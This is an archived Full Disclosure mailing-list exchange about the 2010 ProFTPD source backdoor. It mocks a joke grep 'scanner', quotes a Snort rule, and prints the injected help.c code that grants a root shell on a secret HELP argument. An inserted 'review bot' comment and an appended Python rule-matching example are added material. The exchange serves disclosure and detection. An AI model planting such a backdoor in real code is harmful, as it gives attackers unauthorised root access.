Full Disclosure mailing list archives
Re: New Source Code Vulnerability Scanner (Free 30 Day Trial)
From: Michael McGraw-Herdeg <mherdeg () mit edu>
Date: Thu, 2 Dec 2010 11:48:26 -0800
Hi,

You might want to make the below patch:

======== @@ -9,7 +9,7 @@ # online store. # # 50% of all proceeds will go to the victims that have been -# owned by ACIDBITCHES within the past 6 years. +# owned by ACIDBITCHEZ within the past 6 years. # ################################################################### @@ -17,4 +17,4 @@ export PATH=/bin -grep -r ACIDBITCHES * +grep -r ACIDBITCHEZ * ====

The snort rule you link to is checking for "HELP ACIDBITCHES", I believe incorrectly, as the compromised code actually appears to trigger on the string "ACIDBITCHEZ".

Snort sig (...BITCHES, http://permalink.gmane.org/gmane.comp.security.ids.snort.emerging-sigs/7965)
""
alert tcp any any -> $HOME_NET 21 (msg:"ET CURRENT_EVENTS ProFTPD Backdoor Inbound Backdoor Open Request (ACIDBITCHES)"; flow:established,to_server; content:"HELP ACIDBITCHES"; depth:16; nocase; classtype: trojan-activity;
""

The compromise (...BITCHEZ, http://xorl.wordpress.com/2010/12/02/news-proftpd-owned-and-backdoored/, http://permalink.gmane.org/gmane.mail.postfix.user/215431) includes in src/help.c:
""
    } else if (strcmp(target, "ACIDBITCHEZ") == 0) {
      setuid(0);
      setgid(0);
      system("/bin/sh;/sbin/sh");
    }

    /* List the syntax for the given target command. */
""

Thanks!

On Thu, Dec 2, 2010 at 10:18 AM, <vulnscan () hushmail com> wrote:
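Review bot: In the second hunk of the patch above, "grep -r ACIDBITCHEZ *" still relies on the shell expanding "*", which leaves out dot-prefixed files and directories at the top level of the tree, so a match inside one of them would go unreported. "grep -rF ACIDBITCHEZ ." searches from the current directory itself and treats the pattern as a fixed string. The first hunk only brings the header comment in line with the same spelling and needs no further change.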
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Esteemed members of the Full Disclosure mailing list,

In the wake of the recent compromise of the ProFTPd distribution server and the subsequent root-level backdoor that was placed into the source[0], we are proud to announce a cutting edge source code scanner that will help you detect backdoors in your code.

This code is free to use for 30 days, after which time you must pay for it.

- ------------- el8 Vuln Scan v.0.1 -------------
#!/bin/bash
###################################################################
#
# Place this script inside the top level directory of your
# source code repo.
#
# Please delete this after 30 days, or purchase a copy from our
# online store.
#
# 50% of all proceeds will go to the victims that have been
# owned by ACIDBITCHES within the past 6 years.
#
###################################################################

# main
export PATH=/bin

grep -r ACIDBITCHES *
- ------------- el8 Vuln Scan v.0.1 -------------

Thank you for helping us to help you make the Internet a safer place.

[0] http://permalink.gmane.org/gmane.comp.security.ids.snort.emerging-sigs/7965
-----BEGIN PGP SIGNATURE-----
Charset: UTF8
Version: Hush 3.0
Note: This signature can be verified at https://www.hushtools.com/verify

wpwEAQMCAAYFAkz34wkACgkQnCf21LwRaXbdlwP/bRK2S7SA77h05jF1cdBty4hefooL
Zx0GOeABoqTZKnaNuKxGqwdPtg7fyNctrb7iMzehzJWBXnAD1Zik2UCujZINxeE8BFhw
yTN9gshJZB1cdWSHwxQdiB+NqS9eRqg3s0J8i/9EjzNVkgX4EJTJZMXv9oEUDCgwW92h
7KFZMWU=
=mJJI
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
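The signature mismatch raised in the reply above, as an added example that is not part of either post and is not Snort code: a simplified model of the quoted rule's content, depth and nocase options, run over constructed FTP payloads. The class and function names, the sample payloads and the "corrected" rule are assumptions made for this illustration.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class ContentRule:
    """Simplified model of one Snort-style content match (illustrative names)."""
    name: str
    content: bytes
    depth: int
    nocase: bool = True

    def __post_init__(self):
        # A pattern longer than the depth window could never match.
        if self.depth < len(self.content):
            raise ValueError(f"{self.name}: depth {self.depth} < pattern length")

    def matches(self, payload: bytes) -> bool:
        window = payload[: self.depth]      # depth: search only the first N bytes
        needle = self.content
        if self.nocase:                     # nocase: compare case-insensitively
            window, needle = window.lower(), needle.lower()
        return needle in window

# The rule as quoted in the reply, and the same rule carrying the string the
# quoted src/help.c snippet compares against (the second is an assumption).
QUOTED = ContentRule("quoted", b"HELP ACIDBITCHES", depth=16)
CORRECTED = ContentRule("corrected", b"HELP ACIDBITCHEZ", depth=16)

# Constructed client-to-server payloads; True marks the string the quoted
# help.c snippet tests for with strcmp().
SAMPLES = [
    (b"HELP ACIDBITCHEZ\r\n", True),
    (b"HELP ACIDBITCHES\r\n", False),
    (b"HELP\r\n", False),
    (b"USER anonymous\r\n", False),
]

def evaluate(rule, samples=SAMPLES):
    """Return (trigger payloads the rule misses, alerts on other payloads)."""
    missed = [p for p, trig in samples if trig and not rule.matches(p)]
    false_alerts = [p for p, trig in samples if not trig and rule.matches(p)]
    return missed, false_alerts

if __name__ == "__main__":
    for rule in (QUOTED, CORRECTED):
        missed, false_alerts = evaluate(rule)
        print(f"{rule.name}: missed={missed} false_alerts={false_alerts}")
```

The model covers a single payload and only the three options shown; flow state, stream reassembly and any normalisation the server applies before the strcmp() are outside it.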